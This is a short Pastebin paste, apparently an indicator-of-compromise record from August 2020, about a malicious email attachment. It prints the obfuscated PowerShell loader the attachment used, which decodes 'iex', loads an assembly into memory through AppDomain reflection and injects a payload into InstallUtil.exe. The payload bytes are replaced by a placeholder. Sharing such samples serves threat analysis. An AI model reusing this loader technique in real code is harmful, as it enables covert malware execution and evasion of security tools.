VRad

#IOC_180820_p2

Aug 18th, 2020 (edited)
1,394
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. 18/08/20
  2. - - - - -
  3. email atach threat, payload from internet website
  4. https://pastebin.com/030LpKuP
  5.  
  6. $t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $t0
  7. [String]$iTHr=' **** hex code of payload goes there **** '.replace('<%','0')
  8.  
  9. [Byte[]]$tZFe=UFeppnCY $HcyqzyXBo
  10.  
  11. $y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g;$g55=$y.GetMethod("get_CurrentDomain")
  12.  
  13. $uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g
  14.  
  15. $vmc2='$uy.Lo!%%%%#######@@@@@@@****************($tZFe)'.Replace('!%%%%#######@@@@@@@****************','ad')
  16.  
  17. $vmc2| g
  18.  
  19. [Byte[]]$iTHr2= UFeppnCY $iTHr
  20.  
  21. [rerup]::qw5f0('InstallUtil.exe',$iTHr2)
  22.  
Add Comment
Please, Sign In to add comment